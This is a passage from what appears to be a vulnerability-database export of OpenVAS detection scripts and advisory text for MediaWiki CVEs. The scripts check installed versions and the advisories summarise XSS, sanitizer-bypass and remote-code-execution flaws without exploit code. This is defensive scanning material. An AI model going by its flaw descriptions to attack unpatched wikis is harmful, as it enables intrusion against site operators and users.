02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mediawiki:mediawiki\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806632\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\");\n script_bugtraq_id(65003);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-11-26 16:21:27 +0530 (Thu, 26 Nov 2015)\");\n script_name(\"MediaWiki Multiple Vulnerabilities -02 Nov15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with MediaWiki\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error which displays some information about deleted pages in the log\n API, enhanced RecentChanges, and user watchlists.\n\n - An error in CSS whose sanitization did not filter -o-link attributes.\n\n - An error leading SVG sanitization to bypass when the XML was considered\n invalid.\n\n - An error in SVG files upload that could lead to include external stylesheets\n in upload.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct XSS attacks, gain access to sensitive information and\n have other some unspecified impact.\");\n\n script_tag(name:\"affected\", value:\"MediaWiki before 1.19.10, 1.2x before 1.21.4,\n and 1.22.x before 1.22.1 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 1.19.10 or 1.21.4 or\n 1.22.1 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000138.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"os_detection.nasl\", \"secpod_mediawiki_detect.nasl\");\n script_mandatory_keys(\"mediawiki/installed\", \"Host/runs_windows\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!http_ver = get_app_version(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nif(version_is_less(version:http_ver, test_version:\"1.19.10\"))\n{\n fix = \"1.19.10\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:http_ver, test_version:\"1.20\", test_version2:\"1.21.3\"))\n{\n fix = \"1.21.4\";\n VULN = TRUE ;\n}\n\nelse if(version_is_equal(version:http_ver, test_version:\"1.22.0\"))\n{\n fix = \"1.22.1\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + http_ver + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(port:http_port, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:43", "description": "Check for the Version of mediawiki", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-3338", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867564", "href": "http://plugins.openvas.org/nasl.php?oid=867564", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-3338\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867564);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 09:21:06 +0530 (Wed, 12 Mar 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2242\", \"CVE-2014-2243\",\n \"CVE-2014-2244\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-3338\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-3338\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-March/129882.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.6~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:48:44", "description": "Check for the Version of mediawiki", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-3344", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867562", "href": "http://plugins.openvas.org/nasl.php?oid=867562", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-3344\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867562);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 09:20:47 +0530 (Wed, 12 Mar 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-3344\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki-1.21.6/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-3344\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-March/129844.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.6~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-02-04T18:49:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-3338", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2020-02-04T00:00:00", "id": "OPENVAS:1361412562310867564", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867564", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-3338\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867564\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 09:21:06 +0530 (Wed, 12 Mar 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2242\", \"CVE-2014-2243\",\n \"CVE-2014-2244\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-3338\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-3338\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-March/129882.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.6~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-04T18:49:25", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-3344", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", "CVE-2013-6454", "CVE-2013-6451"], "modified": "2020-02-04T00:00:00", "id": "OPENVAS:1361412562310867562", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867562", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-3344\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867562\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 09:20:47 +0530 (Wed, 12 Mar 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-3344\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-3344\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-March/129844.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.6~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-26T08:49:02", "description": "Several vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project identifies the following\nissues:\n\nCVE-2013-2031 \nCross-site scripting attack via valid UTF-7 encoded sequences\nin a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568 \nKevin Israel (Wikipedia user PleaseStand) reported two ways\nto inject Javascript due to an incomplete blacklist in the\nCSS sanitizer function.\n\nCVE-2013-4572 \nMediaWiki and the CentralNotice extension were incorrectly setting\ncache headers when a user was autocreated, causing the user's\nsession cookies to be cached, and returned to other users.\n\nCVE-2013-6452 \nChris from RationalWiki reported that SVG files could be\nuploaded that include external stylesheets, which could lead to\nXSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453 \nMediaWiki's SVG sanitization could be bypassed when the XML was\nconsidered invalid.\n\nCVE-2013-6454 \nMediaWiki's CSS sanitization did not filter -o-link attributes,\nwhich could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472 \nMediaWiki displayed some information about deleted pages in\nthe log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610 \nA remote code execution vulnerability existed if file upload\nsupport for DjVu (natively handled) or PDF files (in\ncombination with the PdfHandler extension) was enabled.\nNeither file type is enabled by default in MediaWiki.\n\nCVE-2014-2665 \nCross site request forgery in login form: an attacker could login\na victim as the attacker.", "cvss3": {}, "published": "2014-03-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2891-1 (mediawiki, mediawiki-extensions - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4567", "CVE-2013-2031", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-4572"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:702891", "href": "http://plugins.openvas.org/nasl.php?oid=702891", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2891.nasl 6663 2017-07-11 09:58:05Z teissa $\n# Auto-generated from advisory DSA 2891-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"mediawiki, mediawiki-extensions on Debian Linux\";\ntag_solution = \"For the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\";\ntag_summary = \"Several vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project identifies the following\nissues:\n\nCVE-2013-2031 \nCross-site scripting attack via valid UTF-7 encoded sequences\nin a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568 \nKevin Israel (Wikipedia user PleaseStand) reported two ways\nto inject Javascript due to an incomplete blacklist in the\nCSS sanitizer function.\n\nCVE-2013-4572 \nMediaWiki and the CentralNotice extension were incorrectly setting\ncache headers when a user was autocreated, causing the user's\nsession cookies to be cached, and returned to other users.\n\nCVE-2013-6452 \nChris from RationalWiki reported that SVG files could be\nuploaded that include external stylesheets, which could lead to\nXSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453 \nMediaWiki's SVG sanitization could be bypassed when the XML was\nconsidered invalid.\n\nCVE-2013-6454 \nMediaWiki's CSS sanitization did not filter -o-link attributes,\nwhich could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472 \nMediaWiki displayed some information about deleted pages in\nthe log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610 \nA remote code execution vulnerability existed if file upload\nsupport for DjVu (natively handled) or PDF files (in\ncombination with the PdfHandler extension) was enabled.\nNeither file type is enabled by default in MediaWiki.\n\nCVE-2014-2665 \nCross site request forgery in login form: an attacker could login\na victim as the attacker.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702891);\n script_version(\"$Revision: 6663 $\");\n script_cve_id(\"CVE-2013-2031\", \"CVE-2013-4567\", \"CVE-2013-4568\", \"CVE-2013-4572\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2665\");\n script_name(\"Debian Security Advisory DSA 2891-1 (mediawiki, mediawiki-extensions - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-03-30 00:00:00 +0100 (Sun, 30 Mar 2014)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2891.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.14+dfsg-0+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.14+dfsg-0+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.14+dfsg-0+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.14+dfsg-0+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-02-13T16:45:45", "description": "Several vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project identifies the following\nissues:\n\nCVE-2013-2031\nCross-site scripting attack via valid UTF-7 encoded sequences\nin a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\nKevin Israel (Wikipedia user PleaseStand) reported two ways\nto inject Javascript due to an incomplete blacklist in the\nCSS sanitizer function.\n\nCVE-2013-4572\nMediaWiki and the CentralNotice extension were incorrectly setting\ncache headers when a user was autocreated, causing the user", "cvss3": {}, "published": "2014-03-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2891-1 (mediawiki, mediawiki-extensions - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4567", "CVE-2013-2031", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-6452", "CVE-2014-2665", "CVE-2013-6454", "CVE-2013-4572"], "modified": "2020-02-13T00:00:00", "id": "OPENVAS:1361412562310702891", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702891", "sourceData": "# OpenVAS Vulnerability Test\n# Auto-generated from advisory DSA 2891-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702891\");\n script_version(\"2020-02-13T09:17:49+0000\");\n script_cve_id(\"CVE-2013-2031\", \"CVE-2013-4567\", \"CVE-2013-4568\", \"CVE-2013-4572\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2665\");\n script_name(\"Debian Security Advisory DSA 2891-1 (mediawiki, mediawiki-extensions - security update)\");\n script_tag(name:\"last_modification\", value:\"2020-02-13 09:17:49 +0000 (Thu, 13 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-30 00:00:00 +0100 (Sun, 30 Mar 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2891.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"mediawiki, mediawiki-extensions on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and 